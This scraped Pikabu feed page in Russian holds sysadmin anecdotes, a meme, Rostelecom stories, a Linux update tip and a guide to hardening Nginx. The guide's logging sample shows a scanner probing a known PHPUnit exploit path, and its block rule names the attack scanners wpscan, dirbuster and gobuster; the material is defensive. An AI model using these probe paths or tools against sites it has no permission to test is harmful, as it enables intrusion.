1.2. Процесс [kworker/0:0], который нагружает CPU на 100%

Многие видели его, но никто не знает, чем он на самом деле занимается.

  • Миф: Если попытаться его остановить, система зависнет.

  • Реальность: Это часть ядра, но иногда он ведёт себя слишком активно без причины.

"Серверные призраки: когда техника ведёт себя странно" Linux, Баг, Ошибка, Компьютерная помощь, Логи, Материнская плата, Операционная система, Сисадмин, Компьютерное железо, Длиннопост

Глава 2. "Сеть, которая помнит" – аномалии маршрутизации

2.1. Пакеты с несуществующего IP

Бывали случаи, когда сервер получал SYN-запросы с IP-адресов, которых никогда не существовало в этой подсети.

  • Объяснение?
    Ошибка ARP-кэша?
    Кто-то эмулирует трафик?
    Или сеть "помнит" старые адреса?

2.2. Свитч, который передаёт данные без питания

История из форума: после аварийного отключения электричества один свитч продолжал мигать и даже пропускал трафик, хотя был физически отключён от сети.

  • Возможные причины:
    Остаточный заряд в конденсаторах?
    Или что-то более странное?

"Серверные призраки: когда техника ведёт себя странно" Linux, Баг, Ошибка, Компьютерная помощь, Логи, Материнская плата, Операционная система, Сисадмин, Компьютерное железо, Длиннопост

Глава 3. "Жёсткие диски, которые знают слишком много"

3.1. Файлы, которые возвращаются после удаления

Один администратор клялся, что удалил лог-файл, но через неделю он снова был на месте. Проверка fsck не показала ошибок, а inode был новым.

  • Мистика или баг?
    Возможно, это работа скрытого бекап-скрипта.
    Или файловая система "помнит" слишком много.

3.2. Диск, который "предсказывает" ошибки

Некоторые HDD начинают сыпать SMART-ошибками за несколько дней до реального падения. Но есть случаи, когда диск выдавал предупреждения, потом работал годами, а в итоге умирал ровно в предсказанный день.

"Серверные призраки: когда техника ведёт себя странно" Linux, Баг, Ошибка, Компьютерная помощь, Логи, Материнская плата, Операционная система, Сисадмин, Компьютерное железо, Длиннопост

Глава 4. "Сервер, который не хотел умирать"

4.1. Машина, которая загружалась без процессора

На одном форуме описан случай: сервер продолжал работать (с ошибками, но работал!) после того, как из него вынули CPU.

  • Как? Возможно:
    Остаточные заряды в кэше.
    Ошибка BMC/IPMI.
    Или сервер никогда не был настоящим…

4.2. Система, которая отвечала после rm -rf /

Один бедолага случайно удалил корень, но сервер продолжал работать. Оказалось, что некоторые процессы остались в памяти, а init не завершился.

  • Мораль: Даже после апокалипсиса Linux может держаться.

Заключение: "Вы уверены, что это просто глюк?"

IT-инфраструктура — сложная штука, и иногда она ведёт себя так, как не должна. Но что, если некоторые аномалии — не баги, а особенности?

Совет: Если ваш сервер начинает вести себя странно — сначала проверьте логи. А если их нет… может, лучше не копать глубже?

P.S. Если у вас есть подобные истории — пишите в комментарии. Но помните: иногда техника знает больше, чем нам кажется.

Показать полностью 4
[моё] Linux Баг Ошибка Компьютерная помощь Логи Материнская плата Операционная система Сисадмин Компьютерное железо Длиннопост
4
20
0sennijLis
0sennijLis
3 месяца назад
Лига Сисадминов

Продвинутая защита Nginx⁠⁠

Nginx — пока еще один из самых популярных веб-серверов, и ключевой компонент современной корпоративной архитектуры. В этой статье мы рассмотрим базовые параметры конфигурации (доступные "из коробки"), которые упрощают мониторинг, улучшают производительность и усиливают безопасность — в конечном итоге повышая устойчивость вашей инфраструктуры.

Логирование в формате JSON

JSON — лучший выбор формата для логов Nginx по двум основным причинам. Во-первых, он гораздо более читаем для человека. Во-вторых, передача логов в такие системы, как OpenSearch, для последующего мониторинга или в рамках SIEM-решений становится сильно проще.

Вот простой пример из nginx.conf:

log_format json-logger escape=json '{

"type": "access-log",

"time": "$time_iso8601",

"remote-ip": "$remote_addr",

"x-forward-for": "$proxy_add_x_forwarded_for",

"request-id": "$request_id",

"request-length": "$request_length",

"response-bytes": "$bytes_sent",

"response-body-size": "$body_bytes_sent",

"status": "$status",

"vhost": "$host",

"protocol": "$server_protocol",

"path": "$uri",

"query": "$args",

"duration": "$request_time",

"backend-duration": "$upstream_response_time",

"backend-status": "$upstream_status",

"method": "$request_method",

"referer": "$http_referer",

"user-agent": "$http_user_agent",

"active-connections": "$connections_active"

}';

access_log /var/log/nginx/access.log json-logger;

Это приведёт к следующему выводу в файле access.log:

{

"type": "access-log",

"time": "2025-02-25T16:02:54+00:00",

"remote-ip": "130.61.78.239",

"x-forward-for": "130.61.78.239",

"request-id": "38750f2a1a51b196fa0a76025b0d1be9",

"request-length": "258",

"response-bytes": "353",

"response-body-size": "167",

"status": "404",

"vhost": "3.69.78.187",

"protocol": "HTTP/1.1",

"path": "/lib/phpunit/Util/PHP/eval-stdin.php",

"query": "",

"duration": "0.016",

"backend-duration": "0.016",

"backend-status": "404",

"method": "GET",

"referer": "",

"user-agent": "Custom-AsyncHttpClient",

"active-connections": "1"

}

Параметризация запросов

Большие размеры тела запроса, длительные тайм-ауты и чрезмерно увеличенные настройки KeepAlive могут негативно повлиять на производительность. Чтобы повысить эффективность, лучше устанавливать эти параметры на минимально возможные значения — при этом, само собой, соблюдая требования вашего приложения.

Пример из nginx.conf:

client_max_body_size 10M;

client_body_timeout 10s;

client_header_timeout 10s;

keepalive_timeout 5s 5s;

Описание параметров:

  • client_max_body_size

Определяет максимальный размер тела HTTP-запроса, который клиент может отправить. Если лимит превышен, Nginx возвращает ошибку 413 Request Entity Too Large.

  • client_body_timeout

Задает максимальное время ожидания полного тела запроса. Если за это время тело не получено, соединение будет закрыто.

  • client_header_timeout

Устанавливает максимальное время ожидания полного заголовка HTTP-запроса от клиента. Если лимит превышен — соединение также закрывается.

  • keepalive_timeout

Определяет, как долго будет оставаться открытым соединение Keep-Alive после последнего запроса.

Первый параметр (например, 5s) задаёт тайм-аут на стороне сервера. Второй (опциональный) параметр передаётся клиенту как предложение о том, как долго он может держать соединение открытым.

Ограничение количества запросов

На случай если клиент пытается перегрузить веб-сервер частыми запросами, Nginx предоставляет возможность настроить "зоны ограничения запросов" (limit request zones) — для контроля трафика по различным параметрам.

Пример настройки (реверс-прокси с зоной ограничения запросов):

limit_req_zone $binary_remote_addr zone=limitreqsbyaddr:20m rate=15r/s;

limit_req_status 429;

upstream app.localhost {

server localhost:8080;

}

server {

listen 443 ssl;

server_name app.devlab.intern;

location / {

limit_req zone=limitreqsbyaddr burst=10;

proxy_pass http://app.localhost;

}

}

Пояснение параметров:

  • $binary_remote_addr

Используется для настройки зоны ограничения по IP-адресу клиента. Адрес сохраняется в бинарной форме (это снижает потребление памяти).

  • zone=limitreqsbyaddr:20m

Создаёт общую (shared) область памяти объёмом 20 МБ с именем limitreqsbyaddr. В этой зоне хранятся данные о лимитах для разных IP-адресов.

  • rate=15r/s

Ограничивает количество запросов до 15 запросов в секунду на IP. Превышение лимита приводит к отклонению избыточных запросов.

  • limit_req_status 429;

При превышении лимита Nginx возвращает статус 429 Too Many Requests, что означает: "Слишком много запросов за короткое время".

Эта конфигурация помогает защитить сервисы от перегрузки и злоупотреблений.

Ограничение только на необходимые HTTP-методы

На мой взгляд, ограничение допустимых HTTP-методов только теми, которые действительно необходимы или поддерживаются приложением (например, REST API), — это чистый и логичный способ синхронизации настроек веб-сервера с логикой приложения. Это помогает не только предотвратить неправильное использование API или вызов нежелательных методов, но и блокирует потенциально опасные запросы вроде TRACE. Кроме того, это снижает ненужную нагрузку на сервер, устраняя неподдерживаемые или неуместные запросы.

Пример: разрешён только метод GET (HEAD разрешается по умолчанию):

# HEAD is implicit

limit_except GET {

deny all;

}

Пример: разрешить все методы, кроме TRACE и PATCH:

if ($request_method ~ ^(PATCH|TRACE)$) {

return 405;

}

Простая защита от ботов

Если на сервер поступают запросы от ботов или плохо сконфигурированных сканеров (часто с «говорящими» user-agent'ами), можно внести путаницу и затруднить их работу, возвращая нестандартный статус HTTP от самого Nginx.

Для этого создаём файл bot.protection.conf в директории /etc/nginx/snippets со следующим содержимым:

map $http_user_agent $blacklist_user_agents {

~*wpscan 1;

~*dirbuster 1;

~*gobuster 1;

}

Вы можете дополнять список по мере необходимости.

Внутри конфигурации виртуального хоста (VHost) подключите файл следующим образом:

include /etc/nginx/snippets/bot.protection.conf;

if ($blacklist_user_agents) {

return 444;

}

HTTP 444 также можно «весело» использовать для предотвращения угадывания служебных файлов, таких как .env:

# <your-domain>/.bash_history for example ends with HTTP 444.

location ~ /\. {

return 444;

}

Что означает HTTP 444?

HTTP 444 — это нестандартизированный статус-код, используемый в NGINX, который заставляет сервер мгновенно закрыть соединение без отправки заголовков ответа клиенту. Чаще всего используется для отклонения вредоносных или некорректно оформленных запросов. Интересный побочный эффект: некоторые сканеры не умеют корректно обрабатывать такие ответы, что добавляет дополнительный уровень защиты.

Включение TCP Fast Open

TCP Fast Open — это важное улучшение в Nginx, которое позволяет более эффективно устанавливать TCP-соединения. Эта функция даёт возможность начать передачу данных уже во время начального рукопожатия, что заметно ускоряет процесс установления соединения. Особенно полезна она в условиях высокой сетевой задержки, так как помогает сократить латентность и повысить производительность.

Проверка поддержки TCP Fast Open в ядре Linux

Выполните следующую команду:

cat /proc/sys/net/ipv4/tcp_fastopen

Если в ответе вернётся 1, функция уже включена. Если нет — включите её командой:

echo 1 > /proc/sys/net/ipv4/tcp_fastopen

Использование в конфигурации Nginx

Добавьте параметр fastopen в директивы listen:

listen [::]:443 ssl http2 fastopen=500;

listen 443 ssl http2 fastopen=500;

Число 500 — это количество подключений, которые могут использовать TCP Fast Open одновременно (значение можно адаптировать под вашу нагрузку).

Сжатие с помощью GZip

GZip — это метод сжатия данных, позволяющий уменьшить размер файлов. При этом исходные данные можно полностью восстановить путём распаковки («разархивирования») сжатого файла.

Для веб-приложений и сайтов GZip особенно важен, поскольку HTTP-протокол поддерживает передачу данных в сжатом виде до того, как они попадут в сеть.

Почему GZip важен:

  • Снижение трафика: при включённом GZip размер передаваемых файлов уменьшается, что приводит к меньшему потреблению пропускной способности.

  • Экономия на хостинге: меньше трафика — ниже затраты на обслуживание.

  • Ускорение загрузки для пользователей: посетители получают более лёгкие файлы, что сокращает время загрузки страниц.

Пример конфигурации:

gzip on;

gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

Эта настройка включает GZip и указывает типы содержимого, которые следует сжимать (текст, CSS, JavaScript, XML, JSON и др.).

Показать полностью
IT Linux Гайд Системное администрирование Nginx Компьютерные сети Текст Длиннопост
9
rbayram
rbayram
3 месяца назад
IT-юмор

Pinguinux⁠⁠

Pinguinux IT, Linux, Программирование, Системное администрирование, Картинка с текстом
Показать полностью 1
IT Linux Программирование Системное администрирование Картинка с текстом
31
12
SmartF0X
SmartF0X
3 месяца назад
Серия IT байки

Три истории о РосТелеком⁠⁠

История 1. Задорная

Приспичело поменять роутер у мамы дома. Большое село в Самарской области. 2025 год связь - ADSL. Договор оформлен на брата. Он не в сети. Связь нужна. Звоню уточнить пароль. Вбиваю номер договора и робот радостно сообщает дату последнего платёжа и сколько на счету.

Техподдержка говорит, номер телефона то не тот. Для подтверждения продиктуйте дату последнего платежа. Вспоминаю из сообщения, диктую. Мне выдали пароль, оборудование подключено.

История 2. Мутная

Через некоторое время звонят из РосТелекома и называют Имя брата, на которого оформлен договор. Говорю что ошиблись и сбрасывают. И .. подключают несколько доп услуг. Звонил, ругался. Мне объяснили, что я сам подключил услуги, но любезно согласились их отключить.

История 3. Айтишная

Давным давно, в те времена когда был ВолгаТелеком, стоял у них мой сервер на колокейшне. С десятком игр для внутреннего трафика. В один прекрасный момент сервер пропал. И материализовался в "отделе К" c заключением о том что установлен на нём нелицензионный Win 98. Попытки доказать, что установлен там совсем не виндовс, а debian привели к тому, что через год я получил обратно мёртвый сервер с мёртвыми дисками. Далее суд за свои деньги восстанавливал его в официальном тогда ещё сервисе.

Теперь регулярно в офис приходит человек с длинными усами и просит подключить РосТелеком.

С улыбкой говорю - нет. Человек милый, местами наивный, но нет.

Сейчас с улыбкой вспоминаю всё это как нетривиальные приключения.

И не ставьте негатив плз. Негатива нет.

Показать полностью
[моё] Ростелеком IT IT юмор Linux Windows Текст
4
Avenir.Sirgun
Avenir.Sirgun
3 месяца назад
Серия Linux

#Linux , когда стоит его обновлять⁠⁠

Линукс стоит обновлять, когда :

тебе нужна конкретная фича, которая есть только в новой версии программы;

ты узнал об ужасной уязвимости и оно для тебя критично;

закончился период поддержки и тебе очень нужна фича выше.

Задай себе вопросы: зачем ты обновлял ? какое преимущество получить хотелось ?

#Linux , когда стоит его обновлять Linux, Компьютерная помощь, Update
Linux Компьютерная помощь Update
17
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии